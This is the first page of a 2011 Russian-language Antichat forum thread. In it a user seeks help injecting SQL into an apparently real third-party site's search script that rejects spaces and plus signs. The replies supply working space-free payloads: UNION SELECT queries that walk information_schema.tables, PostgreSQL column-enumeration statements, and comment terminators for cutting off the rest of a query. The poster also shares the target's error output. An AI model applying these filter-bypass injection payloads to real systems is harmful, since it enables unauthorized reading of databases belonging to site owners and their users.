HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Что если SQLскрипт фильтрует побелы, и "+"?
   
Ответ
Страница 1 из 3 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.03.2011, 10:33
am319
Guest
Сообщений: n/a
Провел на форуме:
2108

Репутация: 0
По умолчанию
Имею дело с уязвимым поисковым скриптом. Свободно и без ошибок проходят все инъекции без пробелов и "+", например

?q=asd')OR(1=1)OR('sad'='ssd

но стоит в запросе применить пробел, как выдаеца ошибка.

поизучал скрипт, выяснил что это ииза того, что поисковик обрабатывает слова по отдельности, таксказать...чтобы круче искало...

WHERE ((title ILIKE '%asd')%' AND title ILIKE '%or(1=1)or%')

сопсна вопрос: что делать с этой гадостью, дабы была возможность человеческие инъекции проводить, а не "OR(1=1)"??
 
Ответить с цитированием

  #2  
Старый 05.03.2011, 11:12
str71
Guest
Сообщений: n/a
Провел на форуме:
1985

Репутация: 0
По умолчанию
попробуй использовать

Код:
Code:
/**/
 
Ответить с цитированием

  #3  
Старый 05.03.2011, 11:40
am319
Guest
Сообщений: n/a
Провел на форуме:
2108

Репутация: 0
По умолчанию
пробовал.... ему походу ваще на комментарии пофигу... только вот это я не знаю как объяснить
 
Ответить с цитированием

  #4  
Старый 05.03.2011, 11:50
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию
Например так

Код HTML:
HTML:
(-1)union(select(1),2,3)
Код HTML:
HTML:
(-1)union(select(table_name),2,(3)from(information_schema.tables))
Ну и далее перебирать нужные таблицы

Код HTML:
HTML:
(-1)union(select(table_name),2,(3)from(information_schema.tables)where(table_name>'SCHEMA_PRIVILEGES'))
 
Ответить с цитированием

  #5  
Старый 08.03.2011, 10:06
am319
Guest
Сообщений: n/a
Провел на форуме:
2108

Репутация: 0
По умолчанию
чет ваще не канает...но на вопрос ответил, спс.

а вот еще такой момент:

если известно что имею дело с PostgreSQL, то коректна такая связка?

Код HTML:
HTML:
OR(select(blabla))
 
Ответить с цитированием

  #6  
Старый 09.03.2011, 16:59
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию
Для постгреса валидны варианты

Код:
Code:
select"column_name"from"information_schema"."columns"where"table_name"=$$clients$$;
select(column_name)from"information_schema"."columns"where(table_name)='clients';
Имя таблицы в скобках СУБД не принимает
 
Ответить с цитированием

  #7  
Старый 12.03.2011, 12:43
am319
Guest
Сообщений: n/a
Провел на форуме:
2108

Репутация: 0
По умолчанию
чет всеравно выдает трехэтажную ошибку...

есть какойнить способ заставить его игнорировать остальную часть скрипта, кроме /* и # ?
 
Ответить с цитированием

  #8  
Старый 13.03.2011, 22:08
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию
Ошибку-то покажите. В постгресе игнорирование остальной части запроса с помощью /* не выйдет - СУБД выдаст ошибку, ибо требует закрытия комментария. # тут вообще не поможет. Пробуйте

Код:
Code:
--
+--+
;--
;+--+
 
Ответить с цитированием

  #9  
Старый 14.03.2011, 13:49
am319
Guest
Сообщений: n/a
Провел на форуме:
2108

Репутация: 0
По умолчанию
вбиваю к примеру

Код HTML:
HTML:
http://site.ru/trade/future/?q=asd')OR(1=1)OR('ass'='as
выполняется успешно, выводятся воообще все результаты (ибо 1=1 везде)

вместо 1=1 подставляю, к примеру select'1'

на что мне отвечают

Код HTML:
HTML:
ERROR [2] pg_query() [function.pg-query]: Query failed: ERROR: failed to find conversion function from unknown to boolean on line 135 in file /castle/sites/site.ru/htdocs/includes/database/database.pgsql.php  (page: /trade/future/?q=asd')OR(select'1')OR('ass'='as) Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.6.30 Version/10.61ERROR [2] pg_query() [function.pg-query]: Query failed: ERROR: failed to find conversion function from unknown to boolean on line 135 in file /castle/sites/site.ru/htdocs/includes/database/database.pgsql.php  (page: /trade/future/?q=asd')OR(select'1')OR('ass'='as) Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.6.30 Version/10.61
пробовал тут все что умею, но походу недостаточно знаю постгрес
 
Ответить с цитированием

  #10  
Старый 14.03.2011, 14:35
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию
Так?

Код:
Code:
http://site.ru/trade/future/?q=asd')OR(select'1')...
Правильно пишет - ошибка синтаксиса: не может преобразовать результат подзапроса в булевское значение
 
Ответить с цитированием
Ответ
Страница 1 из 3 1 2 3 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ